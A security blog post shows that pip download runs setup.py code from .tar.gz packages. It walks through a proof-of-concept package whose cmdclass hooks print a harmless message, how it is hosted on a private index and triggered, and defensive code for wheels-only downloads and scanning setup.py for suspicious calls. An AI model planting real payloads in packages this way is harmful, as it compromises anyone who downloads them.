Malicious Python Packages and Code Execution via pip download

This week I learned about a design flaw with pip download, which allows an adversary to run arbitrary code.

I had always assumed that running pip install means anything could happen, but code execution from a mere pip download is a bit surprising.

Both seem useful for red teaming though.

Background

This started with a post from Yehuda Gelb named Automatic Execution of Code Upon Package Download on Python Package Manager, which the Security Now! podcast pointed me towards.

The post highlights that just running pip download can compromise your computer.

It turns out that this behavior has been known since at least 2014, based on a pip GitHub issue named Avoid generating metadata in pip download, which raised this concern.

Let’s investigate this more closely.

Authoring a Python package

I had never built a Python package before, but the process is well documented. There are different ways to go about it, and the vulnerability exists when the package uses the older setup.py variation and is distributed as a .tar.gz archive.

There is a basic project I put together on GitHub:

git clone https://github.com/wunderwuzzi23/this_is_fine_wuzzi

The key piece, which took a few minutes to work out (Stack Overflow is your friend), was how to specify a command to run.

The way I went about it (I'm not sure if there are others) is to pass cmdclass to setup(), which causes pip to execute the provided command classes on both download and install of the package.

...
cmdclass={
        'install' : RunInstallCommand,
        'egg_info': RunEggInfoCommand
    },
...

My demo just runs a print command:

...
def RunCommand():
    print("Hello, p0wnd!")


class RunInstallCommand(install):
    def run(self):
        RunCommand()
        install.run(self)
...

Now, we are good to go.

Building the package

The next step is to bundle it up in a package, which is done using:

python -m build

This will create a ./dist/ folder containing the wheel and tar.gz files.

For this demo exploit we are only interested in the tar.gz file.

If you encounter build errors, make sure the setuptools and build packages are installed.

Hosting the package using pypi-server

Now it’s time to host the package on a server.

To test this out, I decided to host the package on my own test pypi-server.

pypi-server run -v -p 8080 ./packages

Then copy the tar.gz file to your pypi-server’s ./packages folder.

Hosting a package

The screenshot above shows how this looks once the server is running.

Download or Install the package

Using the --index-url option, it’s possible to point pip to an alternate package server, which is what we can leverage to test this out:

pip download this_is_fine_wuzzi --index-url http://amstrad:8080 --trusted-host amstrad -v

Our code now runs as part of the download.

Notes:

  1. Messages printed to console won’t be shown unless you specify -v.
  2. The --trusted-host option was added because this was a quick demo test. If you have a TLS connection with a valid certificate, it is not needed.

This can be abused in many ways; think of Jupyter notebooks or Google Colab, for example.

Mitigations

The setup.py is only executed if the package is in tar.gz format. So either review the tar file before using it, or make sure a wheel file (.whl) is present and is the one pip actually uses.
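One way to make sure only wheels are used is pip's --only-binary option, which is not part of my demo above but is a documented pip flag. The sketch below builds such a command; the helper names and the default destination folder are assumptions I made for illustration.

```python
import subprocess
import sys


def build_download_command(package, index_url=None, dest="."):
    """Build a pip download command that refuses source distributions."""
    cmd = [
        sys.executable, "-m", "pip", "download",
        "--only-binary", ":all:",  # wheels only, never fall back to a tar.gz
        "--dest", dest,
        package,
    ]
    if index_url:
        cmd += ["--index-url", index_url]
    return cmd


def download_wheels_only(package, index_url=None, dest="."):
    # check=True raises CalledProcessError if pip exits with an error,
    # for example because no wheel is available for the package.
    return subprocess.run(build_download_command(package, index_url, dest), check=True)
```

Note that the restriction applies to dependencies as well, so the download fails if any of them is only published as a tar.gz.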

You can enumerate the offered packages via https://packagemanager/simple/<package-name>.
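As a rough sketch, the HTML of such an index page could be sorted into wheels and tar.gz files like this. It assumes the page is a plain list of anchor tags, and the function and class names are made up for this example.

```python
from html.parser import HTMLParser
from posixpath import basename
from urllib.parse import urlparse


class LinkCollector(HTMLParser):
    """Collect the href of every <a> tag on the page."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.hrefs.append(href)


def classify_index_page(html):
    """Group the files linked from a simple index page by type."""
    parser = LinkCollector()
    parser.feed(html)
    result = {"wheel": [], "sdist": [], "other": []}
    for href in parser.hrefs:
        # urlparse drops the "#sha256=..." style fragment from the path.
        name = basename(urlparse(href).path)
        if name.endswith(".whl"):
            result["wheel"].append(name)
        elif name.endswith(".tar.gz"):
            result["sdist"].append(name)
        else:
            result["other"].append(name)
    return result
```

If the "wheel" list comes back empty, pip has nothing but the tar.gz to work with, and that is the case worth a closer look.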

This shows which files are hosted for the package (tar.gz, wheel, or both). If the tar.gz is the only option, download it directly (e.g. with wget) and inspect it.
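Inspecting the archive can be done without unpacking or running anything. The following is a minimal sketch that reads every setup.py inside a tar.gz and flags a few strings; the marker list is my own rough heuristic, not a complete detection, and the function name is hypothetical.

```python
import io
import tarfile

# Assumed heuristic: strings that deserve a manual look in a setup.py.
SUSPICIOUS_MARKERS = ("cmdclass", "subprocess", "os.system", "exec(", "eval(")


def inspect_sdist(fileobj):
    """Return (path, markers found) for each setup.py in a .tar.gz.

    The archive is only read, never extracted to disk or executed.
    """
    findings = []
    with tarfile.open(fileobj=fileobj, mode="r:gz") as archive:
        for member in archive.getmembers():
            if member.isfile() and member.name.split("/")[-1] == "setup.py":
                raw = archive.extractfile(member).read()
                source = raw.decode("utf-8", errors="replace")
                hits = [m for m in SUSPICIOUS_MARKERS if m in source]
                findings.append((member.name, hits))
    return findings
```

To use it, open the downloaded file in binary mode and pass the file object to inspect_sdist. A hit on cmdclass is not proof of malice, since legitimate packages use it too, but it tells you which file to read before going any further.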

Conclusions

Having pip download execute arbitrary code is quite unexpected, and it is easy for an attacker to reproduce and exploit. Make sure to inspect packages before you download or install them using pip.

References